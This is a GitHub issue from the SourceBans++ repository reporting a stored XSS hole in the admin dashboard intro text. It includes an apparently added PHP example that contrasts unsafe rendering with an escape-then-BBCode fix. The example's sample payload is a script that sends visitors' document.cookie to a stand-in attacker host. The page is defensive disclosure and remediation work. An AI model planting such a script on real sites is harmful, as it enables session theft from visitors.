sbpp / sourcebans-pp

Admin, ban, and comms management system for the Source engine
https://sbpp.github.io/
Creative Commons Attribution Share Alike 4.0 International
336 stars, 173 forks

Security: XSS vulnerability from dash_intro_text #521

Open hctim opened 6 years ago

hctim commented 6 years ago

$dash_intro_text is initialised on init.php:28 from an untrusted $_GET source. This value is used only in pages/admin.settings.php:239.

This variable normally contains the markup text from the WYSIWYG editor in the SourceBans edit global settings dialogue. This value seems to deliberately subvert the FILTER_SANITIZE_STRING that takes place in init.php:33 to allow server operators to set their introduction text to have markup. Arbitrary HTML can be provided to this value which is then naively used to update the database with its contents, which are now rendered to each visitor of the SourceBans installation.

An issue like this would normally be considered low-impact, as the only ones who can change the MOTD text are the server owners themselves, who could generally modify the page to their wishes anyway. Unfortunately, as seen in #520, there are sometimes weaknesses that thus allow attackers to use this as an XSS avenue.

Sanitising arbitrary HTML is not an easy task, and it may be worth considering BBCode as the markup for your WYSIWYG editor instead of HTML. You can then parse the BBCode to render the page, which would be a much safer alternative.
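To make the two patterns in the report concrete, here is an added example in PHP; it is not SourceBans code and does not reproduce init.php or admin.settings.php. `render_unsafe` stands in for the behaviour described above (markup from the request is stored and echoed verbatim to every visitor), and `render_bbcode` shows the alternative the reporter suggests: HTML-escape the whole value first, then translate only a small whitelist of BBCode tags into fixed HTML. The function names, the tag whitelist and the sample payload are all constructed for this illustration. Note that FILTER_SANITIZE_STRING strips tags when it is applied (and is deprecated as of PHP 8.1), so the point of the BBCode approach is to give admins markup without ever trusting raw HTML.

```php
<?php
// Added example, not part of SourceBans: contrast raw-HTML storage with a
// BBCode dialect that is escaped first and translated second.

// Unsafe pattern described in the issue: whatever the request carried is
// stored and later echoed as-is, so a stored <script> runs for every visitor.
function render_unsafe(string $intro): string
{
    return $intro;
}

// Safer alternative: escape everything, then allow only whitelisted BBCode.
function render_bbcode(string $intro): string
{
    // 1. Neutralise all HTML first. After this no raw tag, attribute or quote
    //    from the input can reach the browser unescaped.
    $safe = htmlspecialchars($intro, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    // 2. Translate a fixed whitelist of BBCode tags into fixed HTML. The
    //    replacement strings are constants, so the only variable part is the
    //    already-escaped inner text ($1). Unbalanced tags stay as literal text.
    $simple = [
        '~\[b\](.*?)\[/b\]~s' => '<strong>$1</strong>',
        '~\[i\](.*?)\[/i\]~s' => '<em>$1</em>',
        '~\[u\](.*?)\[/u\]~s' => '<u>$1</u>',
        '~\[br\]~'            => '<br>',
    ];
    $safe = preg_replace(array_keys($simple), array_values($simple), $safe);

    // 3. Links: only http(s) URLs are accepted, which rules out javascript:
    //    and data: schemes. The href is taken from the escaped text, so any
    //    quote in it is already &quot;/&#039; and cannot close the attribute.
    $safe = preg_replace_callback(
        '~\[url=(https?://[^\]\s"\']+)\](.*?)\[/url\]~s',
        fn(array $m): string =>
            '<a href="' . $m[1] . '" rel="noopener noreferrer">' . $m[2] . '</a>',
        $safe
    );

    return $safe;
}

// Constructed sample payload: what an attacker could plant in the intro text
// if they reach the settings page through a weakness like the one in #520.
$payload = 'Welcome! <script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>'
         . ' [b]Rules:[/b] [url=http://example.invalid/rules]read them[/url]'
         . ' [url=javascript:alert(1)]not a link[/url]';

echo "unsafe : ", render_unsafe($payload), "\n";   // the <script> goes out verbatim
echo "bbcode : ", render_bbcode($payload), "\n";   // <script> is shown as text, [b]/[url] become markup,
                                                   // the javascript: URL is left as inert text
```

The order of the steps is the whole point: escaping before tag translation means the BBCode parser only ever sees inert text, and the HTML it emits is built from constants plus that inert text. Doing it the other way round (rendering BBCode to HTML and then trying to sanitise the result) is exactly the "sanitise arbitrary HTML" problem the reporter warns about.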

rumblefrog commented 5 years ago

Ref extends #520